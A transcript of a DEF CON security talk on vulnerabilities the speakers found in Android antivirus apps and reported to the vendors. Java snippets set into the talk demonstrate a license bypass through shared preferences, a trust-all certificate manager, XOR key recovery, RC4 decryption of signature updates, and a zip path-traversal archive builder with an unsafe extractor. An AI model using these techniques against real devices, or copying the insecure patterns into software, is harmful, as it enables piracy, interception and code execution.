Oh, yeah, that's the kind of subdued, no-sleep, kind of hungover response I was looking for. So it is DEF CON Sunday. Everything's a little bit slower. Everything's a little bit more chill. How many people have to go home today? Oh, that's too bad. How many people have to go to work tomorrow? You've made a huge mistake. I made that mistake once. I will never do it again. You might make alternate plans. Well, either way, thank you guys for coming out. A few years ago at a couple of different conferences, I got stuck with the Sunday morning hangover crowd and it was no fun. So these guys are real troopers for getting up here sober-ish and ready to give you an awesome talk about how fucked antivirus is on cell phones. So let's give Stephan and Siegfried a big round of applause. Yeah, good morning. Thank you. I'm Siegfried and this is my colleague, Stephan. And today we'll talk about antivirus applications in the mobile world. This was joint work together with our team members, Steven, Michael, Andreas, Philipp, and Daniel. So let's get started. Before we get started with the talk, a short announcement. Since this is our first DEF CON talk, and since we're both from Germany, we thought it was a cool idea to bring some local beer to DEF CON. So this is what we did. We checked in this box of beer at the airport, and the lady at the check-in counter was like, what the heck are you doing? She said, I think it won't arrive in the US because you're not allowed to do this. And we said, well, let's give it a try. Long story short, the box arrived and it's over there. Only one bottle didn't make it, so there are 19 left. After the talk, please feel free to come over and have a beer. OK, so let's get started with the real talk. A few words about ourselves. Stephan, would you like to say a few words? Yeah, hello. Good morning. I'm Stephan. I'm a member of the mobile test lab at the Fraunhofer Institute.
And I'm working on mobile security, especially on Android and Android application security. Yeah, thank you. I'm Siegfried. I'm a fourth-year PhD student at TU Darmstadt and Fraunhofer SIT in Germany. I'm about to graduate by the end of this year. My main research focus is static and dynamic code analysis in the context of detecting vulnerabilities or detecting malicious behavior. But this work was not only us; it is basically our team. We established a hacking group called TeamSIK half a year ago. It's basically located at the university, and we look into different interesting security topics. The antivirus applications were one of our first projects, and we will now show you the results of our findings. OK, so let's start with a little bit of motivation. I guess I do not need to motivate this in front of you guys, but this one is interesting: a lot of banking vendors have an entry in their FAQ saying you should install a mobile antivirus application in order to be secure and to securely use their mobile banking application. So they really rely on antivirus applications. And this is somehow interesting: do these antivirus applications really protect us? If not, then all the reliance of these banking applications, for instance, is somehow broken. So let's start with a little bit of background information. As we all know, antivirus applications try to protect us. Their core is the malware detection engine, or the virus detection engine, which is based on signatures or behavior. But in the mobile world, apart from that, these vendors offer a lot of other features. And these features are interesting for the rest of the talk; we'll show four of them now. My favorite one is the loss and theft protection. This means when you lose your device, there is a feature that lets you remotely wipe or remotely lock your smartphone, which someone stole from you.
There is a feature called device configuration advisor. In Android, you have a lot of security settings, and it might be the case that you did not set them in a secure way. So this application warns you and says, well, you probably should enable this or that feature; you shouldn't do this and that. There is secure browsing. This is well known, I guess, from the PC world: if you try to open a website which is malicious, then they block it for you. And spam protection in the mobile area is more about SMS spam or phone call spam. Depending on the vendor, some of them offer these features for free, and for some you have to pay. So it's like a pro version: you pay a certain amount of money, and then you get these nice features. So let's dig a little bit deeper into these applications. I'll show you one application; I guess it's the Kaspersky application. This is the manifest, so all the permissions it requires. But this is not only Kaspersky; all of them require this many permissions. As you can see, there are SMS, contacts, all these sensitive permissions. Why? Well, it's obvious: from the previous slide, we've learned that they have a couple of features, and if the developers implement these features, they have to access certain sensitive API calls. So they need all these sensitive APIs. Well, this is somehow interesting, right? Because if you're able to do some remote code execution or something like this, you don't actually need root. It might be enough if you only have this antivirus application installed, because then you have access to a lot of sensitive data and you can easily send it back. So this was where we started, and it was very interesting to see. As a next step, we looked at the Google Play Store and checked out a couple of applications.
We picked only those Android applications which had at least 1 million downloads, because they are the most interesting ones. They were AndroHelm, Malwarebytes, ESET, Avira, Kaspersky, McAfee, and Cheetah Mobile Security. I know that there are more well-known AV vendors. The reason why we picked only these seven was that our group had seven subgroups, and each subgroup looked into one application. Therefore, we had seven, and we did not look into any other vendors. So let's get started with the real talk. For this talk, we focused on four different challenges. There were a lot more challenges; at the end of the talk, you'll see a link to our white paper where you can read all the details. But for this talk, we will focus on four challenges. First, is it possible to get the premium upgrade for free? Second, my favorite one, misusing the lost device feature. Is it actually possible, if you have an antivirus application installed, to turn it into ransomware? So actually, to turn it into malware. Third, remotely influencing the scan behavior, targeting the heart of these AV applications. And fourth, is it possible to do remote code execution? In the following, we will show you a couple of concrete examples and give you an overview of what we found. So let's start with the first one, premium upgrade for free. For this, we have two examples. The first one is on AndroHelm; it's a very easy example. The second one is a little bit more sophisticated. OK, when you look at the Play Store for this AndroHelm antivirus application, you see that there are different versions of it. When you look very closely, they differ in price. It starts at €9.99 and goes up to €129. The reason is they offer different models. For instance, I guess the €129 one was unlimited usage of all the pro features.
With the €9.99 one, I guess, you can use it only for one month or something like this; it really varies. And the free version, the leftmost one, is for free, but it doesn't have the pro features. You can, of course, pay a certain amount and then you get the pro features, on a monthly or yearly basis. So as a first step, we wanted to know how they check whether you paid or not. We looked into the code, and we found an interesting code snippet saying, thank you for upgrading to pro, and putBoolean("isPro", true). For those of you who are not familiar with Android: in Android you have so-called shared preferences files. These are XML files which store key-value pairs, and they are only accessible within the application if you implement it in a secure way. In this case, it stores "isPro" as the key and true as the value. When we looked at the shared preferences file at installation time, without any pro feature enabled or any payment, we saw that there were already a couple of key-value pairs stored, but there was no isPro = false or anything like that. So what would you do, right? As a first step, of course, you add something like a boolean isPro = true and see what happens. And this is what we did. We added this and then we started the app. And yeah, here we go. This was actually it. This was enough for this application to upgrade it to pro. Just for completeness: for the first attack I have shown, it's mandatory to have a rooted device. Now I will show you a very quick overview of how you do this without root. This is all well known, but just for completeness. You have your mobile device on the left, and then you have the PC, and you can communicate from the PC via ADB, the Android Debug Bridge. So what you do is basically back up this application. Since the application allows backups, it is possible to back it up, and this backup also includes the shared preferences file.
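For those who want to see what that edit looks like: Android's shared_prefs files are plain XML, so injecting the entry is a one-liner once you have the backup unpacked. A minimal Java sketch; the key name isPro is from the talk, but the helper itself is ours and purely illustrative:

```java
public class PrefsPatcher {
    // Insert a boolean entry into an Android shared_prefs XML dump.
    // Android stores shared preferences as <map>...</map>, so adding
    // <boolean name="isPro" value="true" /> before </map> is enough here.
    public static String addBoolean(String prefsXml, String key, boolean value) {
        String entry = "    <boolean name=\"" + key + "\" value=\"" + value + "\" />\n";
        return prefsXml.replace("</map>", entry + "</map>");
    }

    public static void main(String[] args) {
        String original =
            "<?xml version='1.0' encoding='utf-8' standalone='yes' ?>\n" +
            "<map>\n" +
            "    <string name=\"lang\">en</string>\n" +
            "</map>";
        System.out.println(addBoolean(original, "isPro", true));
    }
}
```

After patching the file, the backup is restored to the device as described next, and the app reads the flag as if the upgrade had been purchased.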
Then you basically do a little bit of scripting; there are already a couple of scripts out there which do all of this for you. You add this new line, isPro = true, and then you restore the backup into the application. And here we go. That's it, and you can do it without root. Good. So this was the warm-up, and as a next step, I would like to talk about how ESET did this. With ESET, the situation was a little bit different. They did not check this on the client side; they did the verification of whether it is a pro feature on the server side. You have your application on the left-hand side and the backend on the right-hand side. You authenticate with your username and password. The username and password are sent to the backend, where it is checked whether you paid for the pro features. If yes, it sends back, yes, you paid, and then the features are enabled. So how could an attack work? All we need is the username and the password, because if we have those, we can take our own installation, enter the victim's username and password, and we basically get the same features as the victim. So how can we do this? They did a good job here: they used TLS protection, at least, so it was not sent in plain text. So what can we do? Well, there are well-known vulnerabilities in SSL/TLS, but we didn't want to do crypto-breaking stuff or something like this. We thought, isn't there an easier way? And yeah. The problem in Android, at least, with TLS and SSL is not the protocol itself. The problem is that developers implement it in an insecure way; they make mistakes. And a very common mistake is that they do not check the SSL certificate, for instance.
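The broken pattern just mentioned can be reproduced in a few lines of plain Java. This is our reconstruction of the classic anti-pattern, not ESET's actual code:

```java
import javax.net.ssl.X509TrustManager;
import java.security.cert.X509Certificate;

// Reconstruction of the broken pattern: a custom trust manager whose
// check methods are empty. During the TLS handshake the runtime calls
// checkServerTrusted(); since it never throws, ANY certificate chain is
// accepted and a man in the middle with a self-signed cert goes unnoticed.
public class TrustAllManager implements X509TrustManager {
    @Override
    public void checkClientTrusted(X509Certificate[] chain, String authType) {
        // empty: no validation at all
    }

    @Override
    public void checkServerTrusted(X509Certificate[] chain, String authType) {
        // empty: silently "succeeds" for every server certificate
    }

    @Override
    public X509Certificate[] getAcceptedIssuers() {
        return new X509Certificate[0];
    }
}
```

A correct implementation would throw a CertificateException whenever chain validation (or pinning) fails; an empty body turns the whole handshake check into a no-op.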
More concretely, in Android, if you as a developer create an SSL connection via HTTPS, the operating system itself checks whether the certificate really is the server's certificate; it does the certificate chain validation. But you, as a developer, can also do this by yourself. If you, for whatever reason, do not trust Android or Google, or you say, I have my own checks, you can do this yourself. The only thing you have to do is implement the X509TrustManager interface and then implement a couple of methods which do the checking. One method is the checkServerTrusted method, and within its body you have to implement, for instance, SSL pinning and all the checks you need. And so did ESET, for whatever reason. They implemented their own X509TrustManager, and we also saw the checkServerTrusted method. But when we looked into the body, we saw it was empty. So what does this mean? It means they do not check anything: if I do a man-in-the-middle attack with my own certificate, this method gets called and it does nothing. So SSL is basically broken here, and we can do a man in the middle. So now we are in the situation that we can do a man in the middle. We are sitting between ESET and the backend, and we basically sniffed what was going over the wire. As a test, as I mentioned, we set our username to tester and the password to test, and then we looked at the wire. And we found something interesting. The key was the license username, but the value was not tester. So they somehow encrypted it additionally. This means they did not rely only on the TLS protection; they put an additional encryption layer on the credentials that were sent. Somewhat interesting.
Then we were curious: how do they do this? When you look at the password field, you see some interesting things. When you look at the Base64-decoded value for tester, it is 15, D6, B1, and so on. And for test it is 15, D6, and so on. So this is somehow interesting, right? It looks similar. So let's look a little bit deeper. Next, we did a so-called chosen-plaintext attack. We used as a username, for instance, a, aa, aaa, and so on, and we looked at what the ciphertext looked like. When you look at this table, you see that every second byte is redundant. It's useless, so we can simply remove it. And then when you look at the positions of the plaintext characters: if the first character is an a, for instance, the first cipher byte is always 00. If the first character is a b, it is always 03, and so on and so forth. This showed us that, first, the second byte is not required; second, there is no chaining involved in this encryption scheme; and it looks like a simple substitution. Maybe some of you have already seen how the substitution works, but I will show it to you now in more detail. First, we used the letter a, and we got the cipher byte 00. How can you come from an a to a 00? Obvious, right? You XOR it with a at the first position. Let's verify this. We use b as the first letter: b XOR a is 03, right? We do the same with c: c XOR a is 02, which is correct here. So this showed us it is just a simple XOR with a key. What do you do as a next step? Of course, you create a very long plaintext, you look at the cipher, you do an XOR, and then you have the key. That's it. Just for verification: first, we broke the SSL/TLS communication because it was implemented in an insecure way. Second, we figured out their encryption scheme. We have the key here.
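The whole key recovery described above is one XOR per byte: since c[i] = p[i] ^ k[i], a known plaintext gives you k[i] = p[i] ^ c[i]. A small self-contained sketch, with a made-up key standing in for the real one:

```java
public class XorKeyRecovery {
    // XOR a buffer against a repeating key (both encryption and decryption).
    public static byte[] xor(byte[] data, byte[] key) {
        byte[] out = new byte[data.length];
        for (int i = 0; i < data.length; i++) {
            out[i] = (byte) (data[i] ^ key[i % key.length]);
        }
        return out;
    }

    // Chosen-plaintext attack: register a known username, sniff the
    // ciphertext off the wire, and XOR the two to recover the key stream.
    public static byte[] recoverKey(byte[] knownPlain, byte[] sniffedCipher) {
        return xor(knownPlain, sniffedCipher);
    }

    public static void main(String[] args) {
        byte[] key = {0x21, 0x17, 0x42, 0x0c, 0x5e, 0x33};   // made-up key
        byte[] chosen = "aaaaaa".getBytes();
        byte[] sniffed = xor(chosen, key);                   // what we see on the wire
        byte[] recovered = recoverKey(chosen, sniffed);
        // With the recovered key, any other sniffed credential decrypts:
        byte[] victimCipher = xor("tester".getBytes(), key);
        System.out.println(new String(xor(victimCipher, recovered)));
    }
}
```

The same function serves as encryptor, decryptor, and key-recovery step, which is exactly why a keyed XOR without chaining offers no real protection.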
Then, for instance, for the user tester, we took the encrypted value, XORed it with the key, and we got tester back. So here we go. That was it. Good. Yeah, thank you. For the next challenges, I will hand over to Stephan, and he will talk about the next three. Okay, hi. I will now present the rest of our challenges, and the next one is Siegfried's favorite: misusing the lost device feature. Here we have, again, our old friend, the AndroHelm app. If you remember, this was the one with the sophisticated license verification. So we thought, okay, let's also look into the lost device features. A short summary of what we mean by lost device features. Siegfried already explained it; it's a very simple function: if you have this antivirus application installed, you can activate this feature, and if your smartphone gets lost or stolen, you can use another smartphone or a desktop PC and remotely trigger some features like device location, remote wiping, or remote locking. The question is now: can we, for instance, abuse this remote wiping or remote locking without any authentication, and so transform the antivirus application into malware, for instance lock the device remotely and blackmail the user? How is the remote communication for such services commonly implemented? First, there is Google Cloud Messaging. This is a service by Google which you can use for communicating with the smartphone. There are also some other push service providers, and you can also use SMS messaging. This means if you want to trigger something on the device remotely, you just send an SMS message; the application receives the message and, for instance, executes some command. In our case, this application uses SMS communication. Here you see an excerpt from the application which explains how the anti-theft feature, the remote SMS protocol, is working.
By default, this feature is not activated. This is an important fact, and we will explain later why this is a problem. If you activate the feature, the user has to define two phone numbers of friends. So if the device gets lost, you can go to your friend and say, hey, sorry, I want to track my device, can you lend me your phone? And then you can send the command SMS. The command SMS format is also listed here. As a prefix, you have a password. So it looks okay: you have to authenticate, then you have a space, and then the command. For instance, if you want to trigger the location, you send from your friend's phone an SMS with your password, a space, and the command locate. Let's take a more detailed look at the process. On the left side, you see the user sending an SMS. The application itself is in some kind of wait state, waiting for the SMS. For all the Android-aware people, it's just a simple broadcast receiver which receives the SMS message and triggers some reaction. Here you see our SMS message. At the beginning, you have the password, MyPass, separated by a space from the command, in this example, wipe. Internally, the application now splits the text into two parts at the space. So we have an internal variable, let's call it smsPassword, which in this case is our password, MyPass, and the second variable is the command, here wipe. Then there is a password check: it checks whether the password transferred in the SMS matches the password stored in the application. If this fails, the command will not be executed, and it goes back to the wait state. If the passwords are equal, it executes the command. Okay, now where is the implementation flaw in this process? As I already mentioned, by default this feature is not activated. It is deactivated, and an attacker can abuse this deactivated state. On the left side, you again see our attacker. He will send our malicious SMS.
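The split-and-compare logic just described, including the pitfall that an unconfigured password defaults to the empty string, fits in a few lines. A reconstruction of the flawed logic, not AndroHelm's actual code; the class and variable names are ours:

```java
public class SmsCommandCheck {
    private final String storedPassword;  // "" when anti-theft was never configured

    public SmsCommandCheck(String storedPassword) {
        this.storedPassword = storedPassword;
    }

    // Split the SMS body at the first space into <password> <command>
    // and compare against the stored password. Returns the command that
    // would be executed, or null if the check rejects the message.
    public String handleSms(String body) {
        String[] parts = body.split(" ", 2);
        String smsPassword = parts[0];
        String command = parts.length > 1 ? parts[1].trim().split(" ")[0] : "";
        if (smsPassword.equals(storedPassword)) {
            return command;   // password check passed: command executes
        }
        return null;          // rejected: back to the wait state
    }
}
```

With the feature never configured, storedPassword is "", so an SMS that starts with a space splits into an empty password plus the command, the two empty strings compare equal, and the wipe goes through, exactly the attack shown next.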
For this, he has to know the number of the victim, and he sends a simply crafted SMS. It looks like the following: at the beginning, we have an empty string, then a space, then our command, an additional space, and some irrelevant string. The application now splits it: the first variable, our smsPassword, is empty, and the command, as you see, is our wipe. Now comes the password check, and by default, the stored password is an empty string. When we compare our transferred empty string with the stored empty string, they match, and the command is executed. Now you're asking: but what about the friend's telephone number? Is it also checked? Yes, but it's the same story: if no number is configured, it's an empty string. And with SMS, you can spoof the sender number anyway; I think this is nothing new. Okay, so as you see, something failed in this process. Okay, on to the third challenge: can we remotely influence the scan engine, or the behavior of the scan engine? Here we have a new example; we chose the Malwarebytes antivirus application. At the beginning, here you see a short scheme. As you know, most, or every, antivirus application does signature updates every hour, every day, and so on, to keep the signature database up to date. In this case, the Malwarebytes application does this over plain-text HTTP. HTTP is not protected in any way: you have no authentication, no confidentiality, no integrity check. And smartphones are wireless devices, so you can imagine wireless communication plus unprotected traffic is not such a good idea. So in our first step, we again set up a simple man in the middle, listening to the HTTP traffic. What we saw is that the signature request to the backend is answered with the signature update. In this case, this is a ZIP archive, which is additionally encrypted. The encryption algorithm is RC4.
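RC4 itself is tiny, which shows how little stands between a man in the middle and the signature archive once the key ships inside the APK. A textbook sketch of the cipher with a placeholder key (the real key is the one extracted from the app, which we obviously don't reproduce here):

```java
public class Rc4 {
    // Textbook RC4 (KSA + PRGA). RC4 is symmetric, so the same call
    // encrypts and decrypts. With the key stored in plain text inside
    // the APK, a man in the middle can decrypt the signature archive,
    // strip it, re-encrypt it, and forward it to the victim.
    public static byte[] crypt(byte[] key, byte[] data) {
        int[] S = new int[256];
        for (int i = 0; i < 256; i++) S[i] = i;
        // Key-scheduling algorithm (KSA)
        for (int i = 0, j = 0; i < 256; i++) {
            j = (j + S[i] + (key[i % key.length] & 0xff)) & 0xff;
            int t = S[i]; S[i] = S[j]; S[j] = t;
        }
        // Pseudo-random generation algorithm (PRGA)
        byte[] out = new byte[data.length];
        for (int n = 0, i = 0, j = 0; n < data.length; n++) {
            i = (i + 1) & 0xff;
            j = (j + S[i]) & 0xff;
            int t = S[i]; S[i] = S[j]; S[j] = t;
            out[n] = (byte) (data[n] ^ S[(S[i] + S[j]) & 0xff]);
        }
        return out;
    }
}
```

Note that the weakness exploited here is not RC4's known biases at all: a perfectly strong cipher would fail the same way with its key hardcoded in the client.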
I don't know, but RC4 is not the best algorithm for secure encryption. But we were too lazy to break it anyway, and it's much easier, because the symmetric key for the signature encryption is stored in plain text in the application. If you look into the application or run strings over it, you will find the crypto key. So the man-in-the-middle attacker simply decrypts the archive, can, for instance, remove the signatures, repackage, re-encrypt, and forward it to the victim. And now the scan engine has, as you see, empty signatures. In the next-level attack, for instance, you can send well-known malware or a remote access tool and hijack the smartphone, and the victim is not protected anymore. Yeah, as I already mentioned, it's a simple plain-text attack, not so sophisticated. So we'll show you the last challenge; it's more complex. It's remote code execution: can we inject some foreign code into an antivirus application and remotely trigger its execution? And as you can guess, yes, we can. For this example, we chose the Kaspersky Antivirus and Internet Security application. Here again, at first, as you see, we have our HTTP requests for the signature update, no encryption, no authentication. But in this case, Kaspersky has done better work: they have implemented some integrity protection. For updates, you arguably don't need confidentiality, but integrity protection is very important. So if a man-in-the-middle attacker tries to modify the updates or the signature files, the application will reject them. At the beginning, we thought, OK, Kaspersky has done good work; everything is OK. Despite this, we set up our man in the middle and looked at the different HTTP requests. As you can see, the application transfers some ZIP archives, some XML files, and some JAR files.
What you see here in this ZIP archive is just some company-internal advertisement containing some XML and HTML files, some configuration XML files, and one interesting file, the root-detector JAR file. This JAR file contains Android executable code; you can think of it as a generic library containing executable code which is loaded by the application during runtime. In our first step, we just injected a text file into the archive. And yeah, there is signature protection, so we could not modify or inject executable code into this root detector. But the ZIP archive itself, it seems, is not protected: there was no rejection when we added our evil.txt file. Now let's take a look into the application folder. Here you see the application folder and our ZIP archive, which is extracted after the update by the application. As I mentioned, this is just some simple advertisement banner with some JavaScript, CSS, and HTML files. So it seems it's not so critical. And at the end, here you see our injected evil.txt file. So at first, we thought, OK, we can do nothing; just inserting a text file, or just inserting some file here, is not really a problem because that code will not be executed. So let's take a more detailed look at the rest of the files the application contains. We have some additional files. Again, you see in the middle our root-detector file, which is loaded via the update. But we also have a pdm.jar file. As I already mentioned, it contains executable code, like a library, which is loaded during runtime. But this pdm.jar file is not loaded with the update; it's part of the application. For the Android guys, it's in the APK file. So at the first installation, the pdm.jar file is already there. As I said, it's part of the APK and contains executable code. And our root detector is signed, so that is not really an attack vector. But let's take a look at our pdm.jar file.
Now, instead of the text file, we injected a real pdm.jar file with our own crafted executable code. But the problem is, as you see, the pdm.jar file still lands in the folder which is created by extracting the advertisement archive. So we have to find some way to break out of this archive and to overwrite the original pdm.jar file. And one technique for this is path traversal, or directory traversal. This means that if the ZIP library used by Kaspersky does not validate the file names in the ZIP archive correctly, we can perhaps inject some malformed file names, and because of missing escaping, we can break out of this directory and overwrite the pdm.jar file. I will now show the exploit and explain it in a few details. As I said, we have to overwrite the pdm file with our manipulated file. So we crafted our own ZIP file. If you look at the content of the ZIP file, you can see we have our CSS, HTML, advertisement stuff, and our own pdm.jar file. But this is not a folder prefix: the relative path, the dots and slashes, are part of the file name. The whole file is named dot dot slash dot dot and so on. And because of the erroneous implementation of the ZIP library in the application, it gets extracted, the paths get interpreted, our pdm.jar file overwrites the original, and it is loaded by the application on the next startup. So let me try to give a short summary of the attack again, because it contained more steps and was a bit more complex. First, at the beginning, we found unprotected communication because of the HTTP update requests. Then we augmented the ZIP file with this renamed, path-traversing file. This was possible because the advertisement archive was not integrity protected, and the ZIP library in use contained an implementation flaw. We overwrote existing executable code with our own code.
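The crafted archive and the flawed extractor can both be reproduced with nothing but java.util.zip. A self-contained sketch; the file names mirror the ones in the talk, but the code is our illustration, not the application's actual extractor:

```java
import java.io.File;
import java.io.IOException;
import java.nio.file.Files;
import java.nio.file.Path;
import java.nio.file.StandardCopyOption;
import java.util.zip.ZipEntry;
import java.util.zip.ZipInputStream;
import java.util.zip.ZipOutputStream;

public class ZipTraversalDemo {
    // Build an archive whose entry NAME contains "../", as in the attack:
    // the dots and slashes are part of the file name stored in the zip.
    public static Path buildEvilZip(Path zipFile, String entryName, byte[] payload)
            throws IOException {
        try (ZipOutputStream zos = new ZipOutputStream(Files.newOutputStream(zipFile))) {
            zos.putNextEntry(new ZipEntry(entryName));
            zos.write(payload);
            zos.closeEntry();
        }
        return zipFile;
    }

    // Naive extractor (the flawed pattern): joins destDir + entry name
    // without checking that the resolved path stays inside destDir.
    public static void extractNaively(Path zipFile, Path destDir) throws IOException {
        try (ZipInputStream zis = new ZipInputStream(Files.newInputStream(zipFile))) {
            ZipEntry e;
            while ((e = zis.getNextEntry()) != null) {
                File out = new File(destDir.toFile(), e.getName()); // BUG: no path check
                out.getParentFile().mkdirs();
                Files.copy(zis, out.toPath(), StandardCopyOption.REPLACE_EXISTING);
            }
        }
    }

    public static void main(String[] args) throws IOException {
        Path root = Files.createTempDirectory("demo");
        Path adDir = Files.createDirectories(root.resolve("ad_archive"));
        Path zip = buildEvilZip(root.resolve("update.zip"), "../pdm.jar",
                "evil code".getBytes());
        extractNaively(zip, adDir);
        // The payload escaped ad_archive/ and landed next to it:
        System.out.println(Files.exists(root.resolve("pdm.jar")));
    }
}
```

A safe extractor would canonicalize the joined path and reject any entry that resolves outside the destination directory; skipping that single check is what lets the renamed entry overwrite pdm.jar.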
At the end, when the app restarts, this injected code is executed. And this is working; we have no demo, but really, it was working. OK. So these were our challenges, or the examples we wanted to present to you. Here you see a summary of all our findings. At the top of the table, you see again the different apps we analyzed; on the left side, you see the different types of vulnerabilities and possible attacks. If you take a more detailed look at it, you see each application has at least two or more vulnerabilities. If you're interested in the advisories or more details about the vulnerabilities and the attacks, at the bottom you see the link to the detailed advisories. These are also the advisories we sent to the different antivirus vendors. At the end, we want to share some experiences we made during the responsible disclosure process with the different companies. We informed all the companies, but as you see, one did not fix the vulnerabilities; they did not react to our announcement at all. We tried several ways: we sent emails, we tried web forms, we even tried to contact them through the Google Play Store. But there was no reaction. So if someone is here from AndroHelm, please come up later, or at the end you'll find our contact information. Other fails we had during the responsible disclosure: there are companies which provide websites where you can report a vulnerability you found, and they also provide a public key so that you can send your email confidentially. But on one site, the public key was expired. So how to transfer it? I wrote an email: can you send me a key? The answer came back: the key is on the website. I wrote again: the key is expired. OK, thank you, we'll send you a new one. Another website contained a public PGP key, and it was valid, but the email address did not match. So again: please send me a correct email address. And some others also did not react at all; we pinged them by email, and so on.
But there we had luck, because we met the research director of antivirus security of this company at some conference. I told him about my problem, and half an hour later, I had a PGP key and an email address. What did we learn? Yeah, even big security companies fail at implementation. Their developers are just humans, and humans make mistakes. But on the other side, at these companies work a lot of people who are aware of these problems, and they sometimes should look into their own code or do some code audits, internally or externally. There's also room for improvement in the responsible disclosure process. And the last thing is a bit more funny: it seems they also reuse their code across different products. I think most of you know the name Tavis Ormandy; he was also hunting bugs in Windows antivirus applications. And we found one bug which he had also found, in another application. But he was faster in announcing it, so I missed the bug bounty. This is the end of our presentation. Here you can see our contact information, our Twitter handles, and the website of our student group. There you'll also find the advisories and more information about our projects. Yeah, thank you for your attention. If you have questions, feel free. And as Siegfried announced, you can meet us later, or right here now; we have some beer. We can drink a beer and discuss AV security or Android security. Just feel free. Yeah, thank you.